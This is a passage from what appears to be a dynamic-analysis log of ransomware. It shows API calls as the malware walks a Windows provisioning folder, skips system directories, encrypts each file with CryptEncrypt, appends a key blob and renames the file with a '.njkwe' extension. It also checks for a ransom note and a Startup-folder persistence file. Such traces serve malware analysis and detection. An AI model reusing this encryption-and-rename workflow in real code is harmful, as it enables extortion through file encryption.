(lpString1="355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.554] lstrcmpiW (lpString1="355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.554] lstrcmpiW (lpString1="355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.554] lstrcmpiW (lpString1="355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.554] lstrcmpiW (lpString1="355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.554] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml") returned 165 [0078.554] StrStrIW (lpFirst="355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.554] lstrcmpW (lpString1="355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.554] lstrcmpW (lpString1="355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.554] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\355__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.554] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\355__connections_cellular_vodafone ro (romania)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.555] GetTickCount () returned 0x1153f76 [0078.555] GetTickCount () returned 0x1153f76 [0078.555] GetTickCount () returned 0x1153f76 [0078.555] GetTickCount () returned 0x1153f76 [0078.555] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.555] GetProcessHeap () returned 0xbe0000 [0078.555] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.555] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x392, lpOverlapped=0x0) returned 1 [0078.556] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.556] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x392, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x392, lpOverlapped=0x0) returned 1 [0078.557] GetProcessHeap () returned 0xbe0000 [0078.557] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.557] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.557] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.557] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.557] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.557] CloseHandle (hObject=0x43c) returned 1 [0078.557] GetProcessHeap () returned 0xbe0000 [0078.557] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.557] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 185 [0078.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\355__connections_cellular_vodafone ro (romania)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\355__Connections_Cellular_Vodafone RO (Romania)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\355__connections_cellular_vodafone ro (romania)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.558] GetProcessHeap () returned 0xbe0000 [0078.558] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.558] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d28fbc, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d28fbc, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d28fbc, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="356__C~1.PRO")) returned 1 [0078.558] lstrcmpiW (lpString1="356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0078.558] lstrcmpiW (lpString1="356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0078.558] lstrcmpiW (lpString1="356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0078.558] lstrcmpiW (lpString1="356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0078.558] lstrcmpiW (lpString1="356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0078.558] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0078.558] StrStrIW (lpFirst="356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0078.558] lstrcmpW (lpString1="356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.558] lstrcmpW (lpString1="356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0078.558] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\356__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.558] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\356__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.558] GetTickCount () returned 0x1153f76 [0078.558] GetTickCount () returned 0x1153f76 [0078.558] GetTickCount () returned 0x1153f76 [0078.558] GetTickCount () returned 0x1153f76 [0078.558] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.558] GetProcessHeap () returned 0xbe0000 [0078.559] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.559] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0078.560] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.560] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0078.560] GetProcessHeap () returned 0xbe0000 [0078.560] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.560] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.560] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.562] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.562] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.563] CloseHandle (hObject=0x43c) returned 1 [0078.563] GetProcessHeap () returned 0xbe0000 [0078.563] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.563] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0078.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\356__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\356__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\356__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.563] GetProcessHeap () returned 0xbe0000 [0078.563] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.563] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d28fbc, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d28fbc, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d28fbc, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2fb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml", cAlternateFileName="357_CO~1.PRO")) returned 1 [0078.563] lstrcmpiW (lpString1="357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.563] lstrcmpiW (lpString1="357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.563] lstrcmpiW (lpString1="357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.563] lstrcmpiW (lpString1="357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.564] lstrcmpiW (lpString1="357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.564] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml") returned 203 [0078.564] StrStrIW (lpFirst="357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.564] lstrcmpW (lpString1="357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.564] lstrcmpW (lpString1="357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.564] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\357_Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.564] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\357_connections_cellular_chelyabinsk cellular communications llc (russian federation)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.564] GetTickCount () returned 0x1153f86 [0078.564] GetTickCount () returned 0x1153f86 [0078.564] GetTickCount () returned 0x1153f86 [0078.564] GetTickCount () returned 0x1153f86 [0078.564] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.564] GetProcessHeap () returned 0xbe0000 [0078.564] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.564] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2fb, lpOverlapped=0x0) returned 1 [0078.566] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.566] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2fb, lpOverlapped=0x0) returned 1 [0078.566] GetProcessHeap () returned 0xbe0000 [0078.566] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.566] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.566] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.566] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.566] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.566] CloseHandle (hObject=0x43c) returned 1 [0078.567] GetProcessHeap () returned 0xbe0000 [0078.567] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.567] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 223 [0078.567] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\357_connections_cellular_chelyabinsk cellular communications llc (russian federation)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\357_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\357_connections_cellular_chelyabinsk cellular communications llc (russian federation)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.567] GetProcessHeap () returned 0xbe0000 [0078.567] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.567] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90d28fbc, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90d28fbc, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90d28fbc, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2b7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml", cAlternateFileName="358_CO~1.PRO")) returned 1 [0078.568] lstrcmpiW (lpString1="358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.568] lstrcmpiW (lpString1="358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.568] lstrcmpiW (lpString1="358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.568] lstrcmpiW (lpString1="358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.568] lstrcmpiW (lpString1="358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.568] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml") returned 203 [0078.568] StrStrIW (lpFirst="358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.568] lstrcmpW (lpString1="358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.568] lstrcmpW (lpString1="358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.568] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\358_Connectio", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.568] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\358_Connections_Cellular_Chelyabinsk Cellular Communications LLC (Russian Federation)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\358_connections_cellular_chelyabinsk cellular communications llc (russian federation)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.568] GetTickCount () returned 0x1153f86 [0078.568] GetTickCount () returned 0x1153f86 [0078.568] GetTickCount () returned 0x1153f86 [0078.568] GetTickCount () returned 0x1153f86 [0078.568] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.568] GetProcessHeap () returned 0xbe0000 [0078.568] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.568] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2b7, lpOverlapped=0x0) returned 1 [0078.570] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd49, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.570] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2b7, lpOverlapped=0x0) returned 1 [0078.570] GetProcessHeap () returned 0xbe0000 [0078.570] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.570] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.570] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.570] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.570] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.570] CloseHandle (hObject=0x43c) returned 1 [0078.571] GetProcessHeap () returned 0xbe0000 [0078.571] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.571] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: 